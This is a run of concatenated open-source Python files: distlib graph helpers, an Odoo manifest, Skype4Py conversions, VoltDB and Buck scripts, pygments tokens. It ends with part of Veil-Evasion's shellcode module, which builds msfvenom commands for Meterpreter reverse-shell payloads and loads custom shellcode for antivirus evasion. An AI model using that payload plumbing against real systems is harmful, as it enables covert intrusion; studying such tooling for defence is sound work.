# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
matched = False
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
graph.add_edge(dist, provider, req)
matched = True
break
if not matched:
graph.add_missing(dist, req)
return graph
def get_dependent_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
dependent on *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
dep = [dist] # dependent distributions
todo = graph.reverse_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()
dep.append(d)
for succ in graph.reverse_list[d]:
if succ not in dep:
todo.append(succ)
dep.pop(0) # remove dist from dep, was there to prevent infinite loops
return dep
def get_required_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
required by *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
req = [] # required distributions
todo = graph.adjacency_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()[0]
req.append(d)
for pred in graph.adjacency_list[d]:
if pred not in req:
todo.append(pred)
return req
def make_dist(name, version, **kwargs):
"""
A convenience method for making a dist given just a name and version.
"""
summary = kwargs.pop('summary', 'Placeholder for summary')
md = Metadata(**kwargs)
md.name = name
md.version = version
md.summary = summary or 'Placeholder for summary'
return Distribution(md)
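# Hedged usage sketch (not part of the original distlib module): given an
# iterable of installed distributions (in practice obtained from a
# DistributionPath or similar), make_graph() plus topological_sort() yields an
# installation order; the helper name below is illustrative only.
if __name__ == '__main__':
    def _example_installed_dists():
        # placeholder for a real enumeration of installed distributions
        return []

    _graph = make_graph(_example_installed_dists())
    _ordered, _cyclic = _graph.topological_sort()
    for _d in _ordered:
        print('%s %s' % (_d.name, _d.version))
    if _cyclic:
        print('cycle among: %s' % ', '.join(_d.name for _d in _cyclic))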
|
gpl-3.0
|
open-synergy/vertical-community
|
__unreviewed__/community/__openerp__.py
|
4
|
2022
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron. Copyright Yannick Buron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Odoo for Communities',
'version': '1.0',
'category': 'Community',
'author': 'Yannick Buron',
'license': 'AGPL-3',
'description': """
Odoo for Communities
====================
Use your Odoo to manage communities.
------------------------------------
* Install official modules useful for communities
* Manage community access from a simplified user form
* Add a custom form to install modules for managing the community
""",
'website': 'https://github.com/YannickB/community-management',
'depends': [
'base',
'base_community',
'calendar',
'document',
'gamification',
'im_chat',
'im_livechat',
'mail_holacracy',
'membership',
'membership_users',
'portal',
'website',
'website_mail_group',
],
'data': [
'data/community_data.xml',
'community_view.xml',
'security/community_security.xml',
'res_config_view.xml'
],
'demo': ['data/community_demo.xml'],
'installable': True,
'application': True,
}
|
agpl-3.0
|
djw8605/condor
|
src/condor_contrib/condor_pigeon/src/condor_pigeon_client/skype_linux_tools/Skype4Py/conversion.py
|
10
|
15351
|
'''Conversion between constants and text.
'''
import enums
import os
# Following code is needed when building executable files using py2exe.
# Together with the Languages.__init__ it makes sure that all languages
# are included in the package built by py2exe. The tool looks just at
# the imports; it ignores the 'if' statement.
#
# More about py2exe: http://www.py2exe.org/
if False:
import Languages
class IConversion(object):
'''Allows conversion between constants and text. Access using L{ISkype.Convert<skype.ISkype.Convert>}.
'''
def __init__(self, Skype):
'''__init__.
@param Skype: Skype object.
@type Skype: L{ISkype}
'''
self._Language = u''
self._Module = None
self._SetLanguage('en')
def _TextTo(self, prefix, value):
enum = [z for z in [(y, getattr(enums, y)) for y in [x for x in dir(enums) if x.startswith(prefix)]] if z[1] == value]
if enum:
return str(value)
raise ValueError('Bad text')
def _ToText(self, prefix, value):
enum = [z for z in [(y, getattr(enums, y)) for y in [x for x in dir(enums) if x.startswith(prefix)]] if z[1] == value]
if enum:
try:
return unicode(getattr(self._Module, enum[0][0]))
except AttributeError:
pass
raise ValueError('Bad identifier')
def AttachmentStatusToText(self, Status):
'''Returns attachment status as text.
@param Status: Attachment status.
@type Status: L{Attachment status<enums.apiAttachUnknown>}
@return: Text describing the attachment status.
@rtype: unicode
'''
return self._ToText('api', Status)
def BuddyStatusToText(self, Status):
'''Returns buddy status as text.
@param Status: Buddy status.
@type Status: L{Buddy status<enums.budUnknown>}
@return: Text describing the buddy status.
@rtype: unicode
'''
return self._ToText('bud', Status)
def CallFailureReasonToText(self, Reason):
'''Returns failure reason as text.
@param Reason: Call failure reason.
@type Reason: L{Call failure reason<enums.cfrUnknown>}
@return: Text describing the call failure reason.
@rtype: unicode
'''
return self._ToText('cfr', Reason)
def CallStatusToText(self, Status):
'''Returns call status as text.
@param Status: Call status.
@type Status: L{Call status<enums.clsUnknown>}
@return: Text describing the call status.
@rtype: unicode
'''
return self._ToText('cls', Status)
def CallTypeToText(self, Type):
'''Returns call type as text.
@param Type: Call type.
@type Type: L{Call type<enums.cltUnknown>}
@return: Text describing the call type.
@rtype: unicode
'''
return self._ToText('clt', Type)
def CallVideoSendStatusToText(self, Status):
'''Returns call video send status as text.
@param Status: Call video send status.
@type Status: L{Call video send status<enums.vssUnknown>}
@return: Text describing the call video send status.
@rtype: unicode
'''
return self._ToText('vss', Status)
def CallVideoStatusToText(self, Status):
'''Returns call video status as text.
@param Status: Call video status.
@type Status: L{Call video status<enums.cvsUnknown>}
@return: Text describing the call video status.
@rtype: unicode
'''
return self._ToText('cvs', Status)
def ChatLeaveReasonToText(self, Reason):
'''Returns leave reason as text.
@param Reason: Chat leave reason.
@type Reason: L{Chat leave reason<enums.leaUnknown>}
@return: Text describing the chat leave reason.
@rtype: unicode
'''
return self._ToText('lea', Reason)
def ChatMessageStatusToText(self, Status):
'''Returns message status as text.
@param Status: Chat message status.
@type Status: L{Chat message status<enums.cmsUnknown>}
@return: Text describing the chat message status.
@rtype: unicode
'''
return self._ToText('cms', Status)
def ChatMessageTypeToText(self, Type):
'''Returns message type as text.
@param Type: Chat message type.
@type Type: L{Chat message type<enums.cmeUnknown>}
@return: Text describing the chat message type.
@rtype: unicode
'''
return self._ToText('cme', Type)
def ChatStatusToText(self, Status):
        '''Returns chat status as text.
@param Status: Chat status.
@type Status: L{Chat status<enums.chsUnknown>}
@return: Text describing the chat status.
@rtype: unicode
'''
return self._ToText('chs', Status)
def ConnectionStatusToText(self, Status):
'''Returns connection status as text.
@param Status: Connection status.
@type Status: L{Connection status<enums.conUnknown>}
@return: Text describing the connection status.
@rtype: unicode
'''
return self._ToText('con', Status)
def GroupTypeToText(self, Type):
'''Returns group type as text.
@param Type: Group type.
@type Type: L{Group type<enums.grpUnknown>}
@return: Text describing the group type.
@rtype: unicode
'''
return self._ToText('grp', Type)
def OnlineStatusToText(self, Status):
'''Returns online status as text.
@param Status: Online status.
@type Status: L{Online status<enums.olsUnknown>}
@return: Text describing the online status.
@rtype: unicode
'''
return self._ToText('ols', Status)
def SmsMessageStatusToText(self, Status):
'''Returns SMS message status as text.
@param Status: SMS message status.
@type Status: L{SMS message status<enums.smsMessageStatusUnknown>}
@return: Text describing the SMS message status.
@rtype: unicode
'''
return self._ToText('smsMessageStatus', Status)
def SmsMessageTypeToText(self, Type):
'''Returns SMS message type as text.
@param Type: SMS message type.
@type Type: L{SMS message type<enums.smsMessageTypeUnknown>}
@return: Text describing the SMS message type.
@rtype: unicode
'''
return self._ToText('smsMessageType', Type)
def SmsTargetStatusToText(self, Status):
'''Returns SMS target status as text.
@param Status: SMS target status.
@type Status: L{SMS target status<enums.smsTargetStatusUnknown>}
@return: Text describing the SMS target status.
@rtype: unicode
'''
return self._ToText('smsTargetStatus', Status)
def TextToAttachmentStatus(self, Text):
'''Returns attachment status code.
@param Text: Text, one of 'UNKNOWN', 'SUCCESS', 'PENDING_AUTHORIZATION', 'REFUSED',
'NOT_AVAILABLE', 'AVAILABLE'.
@type Text: unicode
@return: Attachment status.
@rtype: L{Attachment status<enums.apiAttachUnknown>}
'''
conv = {'UNKNOWN': enums.apiAttachUnknown,
'SUCCESS': enums.apiAttachSuccess,
'PENDING_AUTHORIZATION': enums.apiAttachPendingAuthorization,
'REFUSED': enums.apiAttachRefused,
'NOT_AVAILABLE': enums.apiAttachNotAvailable,
'AVAILABLE': enums.apiAttachAvailable}
try:
return self._TextTo('api', conv[Text.upper()])
except KeyError:
raise ValueError('Bad text')
def TextToBuddyStatus(self, Text):
'''Returns buddy status code.
@param Text: Text, one of 'UNKNOWN', 'NEVER_BEEN_FRIEND', 'DELETED_FRIEND',
'PENDING_AUTHORIZATION', 'FRIEND'.
@type Text: unicode
@return: Buddy status.
@rtype: L{Buddy status<enums.budUnknown>}
'''
conv = {'UNKNOWN': enums.budUnknown,
'NEVER_BEEN_FRIEND': enums.budNeverBeenFriend,
'DELETED_FRIEND': enums.budDeletedFriend,
'PENDING_AUTHORIZATION': enums.budPendingAuthorization,
'FRIEND': enums.budFriend}
try:
return self._TextTo('bud', conv[Text.upper()])
except KeyError:
raise ValueError('Bad text')
def TextToCallStatus(self, Text):
'''Returns call status code.
@param Text: Text, one of L{Call status<enums.clsUnknown>}.
@type Text: unicode
@return: Call status.
@rtype: L{Call status<enums.clsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cls', Text)
def TextToCallType(self, Text):
'''Returns call type code.
@param Text: Text, one of L{Call type<enums.cltUnknown>}.
@type Text: unicode
@return: Call type.
@rtype: L{Call type<enums.cltUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('clt', Text)
def TextToChatMessageStatus(self, Text):
'''Returns message status code.
@param Text: Text, one of L{Chat message status<enums.cmsUnknown>}.
@type Text: unicode
@return: Chat message status.
@rtype: L{Chat message status<enums.cmsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cms', Text)
def TextToChatMessageType(self, Text):
'''Returns message type code.
@param Text: Text, one of L{Chat message type<enums.cmeUnknown>}.
@type Text: unicode
@return: Chat message type.
@rtype: L{Chat message type<enums.cmeUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cme', Text)
def TextToConnectionStatus(self, Text):
        '''Returns connection status code.
@param Text: Text, one of L{Connection status<enums.conUnknown>}.
@type Text: unicode
@return: Connection status.
@rtype: L{Connection status<enums.conUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('con', Text)
def TextToGroupType(self, Text):
'''Returns group type code.
@param Text: Text, one of L{Group type<enums.grpUnknown>}.
@type Text: unicode
@return: Group type.
@rtype: L{Group type<enums.grpUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('grp', Text)
def TextToOnlineStatus(self, Text):
'''Returns online status code.
@param Text: Text, one of L{Online status<enums.olsUnknown>}.
@type Text: unicode
@return: Online status.
@rtype: L{Online status<enums.olsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('ols', Text)
def TextToUserSex(self, Text):
'''Returns user sex code.
@param Text: Text, one of L{User sex<enums.usexUnknown>}.
@type Text: unicode
@return: User sex.
@rtype: L{User sex<enums.usexUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('usex', Text)
def TextToUserStatus(self, Text):
'''Returns user status code.
@param Text: Text, one of L{User status<enums.cusUnknown>}.
@type Text: unicode
@return: User status.
@rtype: L{User status<enums.cusUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cus', Text)
def TextToVoicemailStatus(self, Text):
'''Returns voicemail status code.
@param Text: Text, one of L{Voicemail status<enums.vmsUnknown>}.
@type Text: unicode
@return: Voicemail status.
@rtype: L{Voicemail status<enums.vmsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('vms', Text)
def UserSexToText(self, Sex):
'''Returns user sex as text.
@param Sex: User sex.
@type Sex: L{User sex<enums.usexUnknown>}
@return: Text describing the user sex.
@rtype: unicode
'''
return self._ToText('usex', Sex)
def UserStatusToText(self, Status):
'''Returns user status as text.
@param Status: User status.
@type Status: L{User status<enums.cusUnknown>}
@return: Text describing the user status.
@rtype: unicode
'''
return self._ToText('cus', Status)
def VoicemailFailureReasonToText(self, Reason):
'''Returns voicemail failure reason as text.
@param Reason: Voicemail failure reason.
@type Reason: L{Voicemail failure reason<enums.vmrUnknown>}
@return: Text describing the voicemail failure reason.
@rtype: unicode
'''
return self._ToText('vmr', Reason)
def VoicemailStatusToText(self, Status):
'''Returns voicemail status as text.
@param Status: Voicemail status.
@type Status: L{Voicemail status<enums.vmsUnknown>}
@return: Text describing the voicemail status.
@rtype: unicode
'''
return self._ToText('vms', Status)
def VoicemailTypeToText(self, Type):
'''Returns voicemail type as text.
@param Type: Voicemail type.
@type Type: L{Voicemail type<enums.vmtUnknown>}
@return: Text describing the voicemail type.
@rtype: unicode
'''
return self._ToText('vmt', Type)
def _GetLanguage(self):
return self._Language
def _SetLanguage(self, Language):
try:
self._Module = __import__('Languages.%s' % Language, globals(), locals(), ['Languages'])
self._Language = unicode(Language)
except ImportError:
raise ValueError('Unknown language: %s' % Language)
Language = property(_GetLanguage, _SetLanguage,
doc='''Language used for all "ToText" conversions.
Currently supported languages: ar, bg, cs, cz, da, de, el, en, es, et, fi, fr, he, hu, it, ja, ko,
lt, lv, nl, no, pl, pp, pt, ro, ru, sv, tr, x1.
@type: unicode
''')
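# Hedged usage sketch (not part of the original Skype4Py module): IConversion is
# normally reached as skype.Convert on an ISkype instance; constructing it
# directly, as below, is illustrative only, needs the Languages subpackage on
# the import path, and assumes enums defines olsOnline alongside olsUnknown.
if __name__ == '__main__':
    conv = IConversion(None)
    print conv.Language                              # u'en' by default
    print conv.OnlineStatusToText(enums.olsOnline)   # localized status text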
|
apache-2.0
|
wwgong/CVoltDB
|
tests/scripts/profctl.py
|
4
|
1385
|
#!/usr/bin/env python
# -*- coding: utf-8
# This file is part of VoltDB.
# Copyright (C) 2008-2011 VoltDB Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
from voltdbclient import *
client = FastSerializer("localhost", 21212)
proc = VoltProcedure(client, "@ProfCtl", [FastSerializer.VOLTTYPE_STRING])
response = proc.call([sys.argv[1]])
for x in response.tables:
print x
|
gpl-3.0
|
Distrotech/buck
|
programs/gen_buck_info.py
|
11
|
1482
|
import errno
import os
import json
import sys
import time
import buck_version
def main(argv):
# Locate the root of the buck repo. We'll need to be there to
# generate the buck version UID.
path = os.getcwd()
while not os.path.exists(os.path.join(path, '.buckconfig')):
path = os.path.dirname(path)
if os.path.exists(os.path.join(path, '.git')):
# Attempt to create a "clean" version, but fall back to a "dirty"
# one if need be.
version = buck_version.get_clean_buck_version(path)
timestamp = -1
if version is None:
version = buck_version.get_dirty_buck_version(path)
else:
timestamp = buck_version.get_git_revision_timestamp(path)
else:
# We're building outside a git repo. Check for the special
# .buckrelease file created by the release process.
try:
with open(os.path.join(path, '.buckrelease')) as f:
timestamp = int(os.fstat(f.fileno()).st_mtime)
version = f.read().strip()
except IOError, e:
if e.errno == errno.ENOENT:
# No .buckrelease file. Do the best that we can.
version = '(unknown version)'
timestamp = int(time.time())
else:
raise e
json.dump(
{'version': version, 'timestamp': timestamp},
sys.stdout,
sort_keys=True,
indent=2)
sys.exit(main(sys.argv))
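# Hedged note (not part of the original buck script): the json.dump call above
# writes a two-key object to stdout; with sort_keys=True and indent=2 the
# output has the shape below (values illustrative only):
# {
#   "timestamp": 1400000000,
#   "version": "abc123"
# }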
|
apache-2.0
|
3dfxsoftware/cbss-addons
|
stock_picking_validate_past/__init__.py
|
1
|
1292
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: Luis Torres ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock
import stock_partial_move
|
gpl-2.0
|
thinkwhale/MyTakeOnQuotes
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/token.py
|
365
|
5662
|
# -*- coding: utf-8 -*-
"""
pygments.token
~~~~~~~~~~~~~~
Basic token types and the standard tokens.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
class _TokenType(tuple):
parent = None
def split(self):
buf = []
node = self
while node is not None:
buf.append(node)
node = node.parent
buf.reverse()
return buf
def __init__(self, *args):
# no need to call super.__init__
self.subtypes = set()
def __contains__(self, val):
return self is val or (
type(val) is self.__class__ and
val[:len(self)] == self
)
def __getattr__(self, val):
if not val or not val[0].isupper():
return tuple.__getattribute__(self, val)
new = _TokenType(self + (val,))
setattr(self, val, new)
self.subtypes.add(new)
new.parent = self
return new
def __repr__(self):
return 'Token' + (self and '.' or '') + '.'.join(self)
Token = _TokenType()
# Special token types
Text = Token.Text
Whitespace = Text.Whitespace
Error = Token.Error
# Text that doesn't belong to this lexer (e.g. HTML in PHP)
Other = Token.Other
# Common token types for source code
Keyword = Token.Keyword
Name = Token.Name
Literal = Token.Literal
String = Literal.String
Number = Literal.Number
Punctuation = Token.Punctuation
Operator = Token.Operator
Comment = Token.Comment
# Generic types for non-source code
Generic = Token.Generic
# String and some others are not direct children of Token.
# alias them:
Token.Token = Token
Token.String = String
Token.Number = Number
def is_token_subtype(ttype, other):
"""
    Return True if ``ttype`` is a subtype of ``other``.
    Exists for backwards compatibility; use ``ttype in other`` now.
"""
return ttype in other
def string_to_tokentype(s):
"""
Convert a string into a token type::
>>> string_to_token('String.Double')
Token.Literal.String.Double
>>> string_to_token('Token.Literal.Number')
Token.Literal.Number
>>> string_to_token('')
Token
Tokens that are already tokens are returned unchanged:
>>> string_to_token(String)
Token.Literal.String
"""
if isinstance(s, _TokenType):
return s
if not s:
return Token
node = Token
for item in s.split('.'):
node = getattr(node, item)
return node
# Map standard token types to short names, used in CSS class naming.
# If you add a new item, please be sure to run this file to perform
# a consistency check for duplicate values.
STANDARD_TYPES = {
Token: '',
Text: '',
Whitespace: 'w',
Error: 'err',
Other: 'x',
Keyword: 'k',
Keyword.Constant: 'kc',
Keyword.Declaration: 'kd',
Keyword.Namespace: 'kn',
Keyword.Pseudo: 'kp',
Keyword.Reserved: 'kr',
Keyword.Type: 'kt',
Name: 'n',
Name.Attribute: 'na',
Name.Builtin: 'nb',
Name.Builtin.Pseudo: 'bp',
Name.Class: 'nc',
Name.Constant: 'no',
Name.Decorator: 'nd',
Name.Entity: 'ni',
Name.Exception: 'ne',
Name.Function: 'nf',
Name.Property: 'py',
Name.Label: 'nl',
Name.Namespace: 'nn',
Name.Other: 'nx',
Name.Tag: 'nt',
Name.Variable: 'nv',
Name.Variable.Class: 'vc',
Name.Variable.Global: 'vg',
Name.Variable.Instance: 'vi',
Literal: 'l',
Literal.Date: 'ld',
String: 's',
String.Backtick: 'sb',
String.Char: 'sc',
String.Doc: 'sd',
String.Double: 's2',
String.Escape: 'se',
String.Heredoc: 'sh',
String.Interpol: 'si',
String.Other: 'sx',
String.Regex: 'sr',
String.Single: 's1',
String.Symbol: 'ss',
Number: 'm',
Number.Float: 'mf',
Number.Hex: 'mh',
Number.Integer: 'mi',
Number.Integer.Long: 'il',
Number.Oct: 'mo',
Operator: 'o',
Operator.Word: 'ow',
Punctuation: 'p',
Comment: 'c',
Comment.Multiline: 'cm',
Comment.Preproc: 'cp',
Comment.Single: 'c1',
Comment.Special: 'cs',
Generic: 'g',
Generic.Deleted: 'gd',
Generic.Emph: 'ge',
Generic.Error: 'gr',
Generic.Heading: 'gh',
Generic.Inserted: 'gi',
Generic.Output: 'go',
Generic.Prompt: 'gp',
Generic.Strong: 'gs',
Generic.Subheading: 'gu',
Generic.Traceback: 'gt',
}
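# Hedged usage sketch (not part of the original pygments module): token types
# are created lazily on attribute access, containment expresses the subtype
# relation, and STANDARD_TYPES maps each type to the short CSS class name above.
if __name__ == '__main__':
    assert Name.Function in Name                        # subtype containment
    assert is_token_subtype(String.Double, Literal)     # same check, old API
    assert string_to_tokentype('Literal.String.Double') is String.Double
    print(STANDARD_TYPES[Comment.Single])               # prints: c1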
|
mit
|
g0tmi1k/veil-Evasion
|
modules/common/shellcode.py
|
3
|
24253
|
"""
Contains main Shellcode class as well as the Completer class used
for tab completion of metasploit payload selection.
"""
# Import Modules
import commands
import socket
import sys
import os
import sys
import re
import readline
import subprocess
import binascii
from modules.common import messages
from modules.common import helpers
from modules.common import completers
import settings
class Shellcode:
"""
    Class that represents a shellcode object, either custom or msfvenom-generated.
"""
def __init__(self):
# the nested dictionary passed to the completer
self.payloadTree = {}
        # the entire msfvenom command that may be built
self.msfvenomCommand = ""
# any associated msfvenom options
self.msfvenomOptions = list()
# in case user specifies a custom shellcode string
self.customshellcode = ""
# specific msfvenom payload specified
self.msfvenompayload= ""
# misc options
self.options = list()
# required options
self.required_options = list()
# load up all the metasploit modules available
self.LoadModules()
def Reset(self):
"""
reset the state of any internal variables, everything but self.payloadTree
"""
self.msfvenomCommand = ""
self.msfvenomOptions = list()
self.customshellcode = ""
self.msfvenompayload= ""
self.options = list()
def LoadModules(self):
"""
Crawls the metasploit install tree and extracts available payloads
        and their associated required options for the languages specified.
"""
# Variable changed for compatibility with non-root and non-Kali users
# Thanks to Tim Medin for the patch
msfFolder = settings.METASPLOIT_PATH
# I can haz multiple platforms?
platforms = ["windows"]
for platform in platforms:
self.payloadTree[platform] = {}
stagesX86 = list()
stagersX86 = list()
stagesX64 = list()
stagersX64 = list()
# load up all the stages (meterpreter/vnc/etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stages/" + platform + "/"):
for f in files:
stageName = f.split(".")[0]
if "x64" in root:
stagesX64.append(f.split(".")[0])
if "x64" not in self.payloadTree[platform]:
self.payloadTree[platform]["x64"] = {}
self.payloadTree[platform]["x64"][stageName] = {}
elif "x86" in root: # linux payload structure format
stagesX86.append(f.split(".")[0])
if "x86" not in self.payloadTree[platform]:
self.payloadTree[platform]["x86"] = {}
self.payloadTree[platform]["x86"][stageName] = {}
else: # windows payload structure format
stagesX86.append(f.split(".")[0])
if stageName not in self.payloadTree[platform]:
self.payloadTree[platform][stageName] = {}
# load up all the stagers (reverse_tcp, bind_tcp, etc.)
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/stagers/" + platform + "/"):
for f in files:
if ".rb" in f:
extraOptions = list()
moduleName = f.split(".")[0]
lines = open(root + "/" + f).readlines()
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
extraOptions.append(cmd)
if "bind" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LPORT"] + extraOptions
if "reverse" in f:
if "x64" in root:
for stage in stagesX64:
self.payloadTree[platform]["x64"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
elif "x86" in root:
for stage in stagesX86:
self.payloadTree[platform]["x86"][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
else:
for stage in stagesX86:
self.payloadTree[platform][stage][moduleName] = ["LHOST", "LPORT"] + extraOptions
# load up any payload singles
# TODO: detect Windows and modify the paths appropriately
for root, dirs, files in os.walk(settings.METASPLOIT_PATH + "/modules/payloads/singles/" + platform + "/"):
for f in files:
if ".rb" in f:
lines = open(root + "/" + f).readlines()
totalOptions = list()
moduleName = f.split(".")[0]
for line in lines:
if "OptString" in line.strip() and "true" in line.strip():
cmd = line.strip().split(",")[0].replace("OptString.new(","")[1:-1]
totalOptions.append(cmd)
if "bind" in f:
totalOptions.append("LPORT")
if "reverse" in f:
totalOptions.append("LHOST")
totalOptions.append("LPORT")
if "x64" in root:
self.payloadTree[platform]["x64"][moduleName] = totalOptions
elif "x86" in root:
self.payloadTree[platform]["x86"][moduleName] = totalOptions
else:
self.payloadTree[platform][moduleName] = totalOptions
def SetPayload(self, payloadAndOptions):
"""
Manually set the payload/options, used in scripting
payloadAndOptions = nested 2 element list of [msfvenom_payload, ["option=value",...]]
i.e. ["windows/meterpreter/reverse_tcp", ["LHOST=192.168.1.1","LPORT=443"]]
"""
# extract the msfvenom payload and options
payload = payloadAndOptions[0]
options = payloadAndOptions[1]
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build the msfvenom command
# TODO: detect Windows and modify the msfvenom command appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payload
# add options only if we have some
if options:
for option in options:
self.msfvenomCommand += " " + option + " "
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
# set the internal msfvenompayload to this payload
self.msfvenompayload = payload
# set the internal msfvenomOptions to these options
if options:
for option in options:
self.msfvenomOptions.append(option)
def setCustomShellcode(self, customShellcode):
"""
Manually set self.customshellcode to the shellcode string passed.
customShellcode = shellcode string ("\x00\x01...")
"""
self.customshellcode = customShellcode
def custShellcodeMenu(self, showTitle=True):
"""
Menu to prompt the user for a custom shellcode string.
Returns None if nothing is specified.
"""
# print out the main title to reset the interface
if showTitle:
messages.title()
print ' [?] Use msfvenom or supply custom shellcode?\n'
print ' %s - msfvenom %s' % (helpers.color('1'), helpers.color('(default)',yellow=True))
print ' %s - custom shellcode string' % (helpers.color('2'))
print ' %s - file with shellcode (raw)\n' % (helpers.color('3'))
try:
choice = self.required_options['SHELLCODE'][0].lower().strip()
print(" [>] Please enter the number of your choice: %s" % (choice))
except:
choice = raw_input(" [>] Please enter the number of your choice: ").strip()
if choice == '3':
# instantiate our completer object for path completion
comp = completers.PathCompleter()
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
            # if the shellcode is specified as a raw file
filePath = raw_input(" [>] Please enter the path to your raw shellcode file: ")
try:
shellcodeFile = open(filePath, 'rb')
CustShell = shellcodeFile.read()
shellcodeFile.close()
except:
print helpers.color(" [!] WARNING: path not found, defaulting to msfvenom!", warning=True)
return None
if len(CustShell) == 0:
                print helpers.color(" [!] WARNING: no custom shellcode retrieved, defaulting to msfvenom!", warning=True)
return None
# check if the shellcode was passed in as string-escaped form
if CustShell[0:2] == "\\x" and CustShell[4:6] == "\\x":
return CustShell
else:
# otherwise encode the raw data as a hex string
hexString = binascii.hexlify(CustShell)
CustShell = "\\x"+"\\x".join([hexString[i:i+2] for i in range(0,len(hexString),2)])
return CustShell
# remove the completer
readline.set_completer(None)
elif choice == '2' or choice == 'string':
# if the shellcode is specified as a string
CustomShell = raw_input(" [>] Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
if len(CustomShell) == 0:
print helpers.color(" [!] WARNING: no shellcode specified, defaulting to msfvenom!", warning=True)
return CustomShell
elif choice == '' or choice == '1' or choice == 'msf' or choice == 'metasploit' or choice == 'msfvenom':
return None
else:
